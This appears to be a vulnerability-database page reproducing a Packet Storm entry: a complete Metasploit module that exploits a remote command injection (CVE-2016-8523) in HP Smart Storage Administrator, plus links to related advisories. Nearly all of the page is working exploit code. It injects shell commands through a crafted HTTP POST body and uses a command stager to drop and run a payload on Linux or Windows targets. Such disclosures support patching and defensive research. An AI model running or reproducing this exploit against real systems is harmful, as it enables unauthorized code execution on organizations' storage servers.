Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNicolas MattioccoPACKETSTORM:141016
HistoryFeb 10, 2017 - 12:00 a.m.

HP Smart Storage Administrator 2.30.6.0 Remote Command Injection

2017-02-1000:00:00
Nicolas Mattiocco
packetstormsecurity.com
61

EPSS

0.159

Percentile

96.1%

JSON
`#  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "HP Smart Storage Administrator Remote Command Injection",  
'Description' => %q{  
This module exploits a vulnerability found in HP Smart Storage Administrator. By  
supplying a specially crafted HTTP request, it is possible to control the  
'command' variable in function isDirectFileAccess (found in ipcelmclient.php),  
which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module  
],  
'References' =>  
[  
['CVE', '2016-8523']  
],  
'DefaultOptions' =>  
{  
'SSL' => true  
},  
'Platform' => %w{ linux win },  
'Targets' =>  
[  
['Linux', {  
'Platform' => 'linux',  
'Arch' => ARCH_X86,  
'CmdStagerFlavor' => 'bourne'  
}],  
['Linux (x64)', {  
'Platform' => 'linux',  
'Arch' => ARCH_X86_64,  
'CmdStagerFlavor' => 'bourne'  
}],  
['Windows', {  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'CmdStagerFlavor' => 'certutil'  
}],  
['Windows (x64)', {  
'Platform' => 'win',  
'Arch' => ARCH_X86_64,  
'CmdStagerFlavor' => 'certutil'  
}],  
],  
'Privileged' => false,  
'DisclosureDate' => "Jan 30 2017"  
))  
  
register_options(  
[  
Opt::RPORT(2381),  
# USERNAME/PASS may not be necessary, because the anonymous access is possible  
OptString.new("USERNAME", [false, 'The username to authenticate as']),  
OptString.new("PASSWORD", [false, 'The password to authenticate with'])  
], self.class)  
end  
  
def check  
  
@cookie = ''  
  
sig = Rex::Text.rand_text_alpha(8)  
cmd = "&echo%20#{sig}&echo"  
res = send_command(cmd, true)  
if not res  
vprint_error("#{peer} - Connection timed out")  
return Exploit::CheckCode::Unknown  
end  
  
if res.code == 200 && res.headers.to_s() =~ /#{sig}/  
return Exploit::CheckCode::Vulnerable  
end  
  
Exploit::CheckCode::Safe  
end  
  
  
def login  
username = datastore['USERNAME']  
password = datastore['PASSWORD']  
  
cookie = ''  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => '/proxy/ssllogin',  
'vars_post' => {  
'redirecturl' => '',  
'redirectquerystring' => '',  
'user' => username,  
'password' => password  
}  
})  
  
if not res  
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")  
end  
  
# CpqElm-Login: success  
if res.headers['CpqElm-Login'].to_s =~ /success/  
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''  
end  
  
cookie  
end  
  
  
def setup_stager  
execute_cmdstager(:temp => './', :linemax => 2800)  
end  
  
  
def execute_command(cmd, opts={})  
res = send_command(cmd, false)  
if res && res.code != 200  
vprint_error("Unexpected response:\n#{res}")  
fail_with(Failure::Unknown, "There was an unexpected response")  
end  
end  
  
  
def send_command(cmd, check)  
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?  
@cookie = login  
if @cookie.empty?  
fail_with(Failure::NoAccess, "#{peer} - Login failed")  
else  
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")  
end  
end  
  
req_opts = {}  
  
# For the check() function, use GET method  
if check  
req_opts['uri'] = "/HPSSA/index.htm#{cmd}"  
req_opts['method'] = "GET"  
else  
req_opts['uri'] = "/HPSSA/index.htm"  
req_opts['method'] = "POST"  
req_opts['vars_post'] = {'msf'=>'red'}  
case target.opts['Platform']  
when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""  
when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""  
end  
end  
  
unless @cookie.empty?  
browser_chk = 'HPSMH-browser-check=done for this session'  
curl_loc = "curlocation-#{datastore['USERNAME']}="  
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"  
end  
  
send_request_cgi(req_opts)  
end  
  
def exploit  
@cookie = ''  
  
setup_stager  
end  
end  
  
`

Related

prion 1
saint 3
checkpoint_advisories 1
exploitdb 1
zdt 1
cve 1
cvelist 1
nvd 1
nessus 1
prion
prion
Remote code execution
2018-02-15 22:29:00
saint
saint
HP Smart Storage Administrator command injection
2017-02-16 00:00:00
HP Smart Storage Administrator command injection
2017-02-16 00:00:00
HP Smart Storage Administrator command injection
2017-02-16 00:00:00
checkpoint_advisories
checkpoint_advisories
HPE Smart Storage Administrator Code Execution (CVE-2016-8523)
2017-06-14 00:00:00
exploitdb
exploitdb
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
2017-02-10 00:00:00
zdt
zdt
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection Exploit
2017-02-10 00:00:00
cve
cve
CVE-2016-8523
2018-02-15 22:29:01
cvelist
cvelist
CVE-2016-8523
2018-02-15 22:00:00
nvd
nvd
CVE-2016-8523
2018-02-15 22:29:01
nessus
nessus
HPE Smart Storage Administrator < 2.60.18.0 RCE
2017-03-21 00:00:00

EPSS

0.159

Percentile

96.1%

JSON
Related for PACKETSTORM:141016
prion1saint3checkpoint_advisories1exploitdb1zdt1cve1cvelist1nvd1nessus1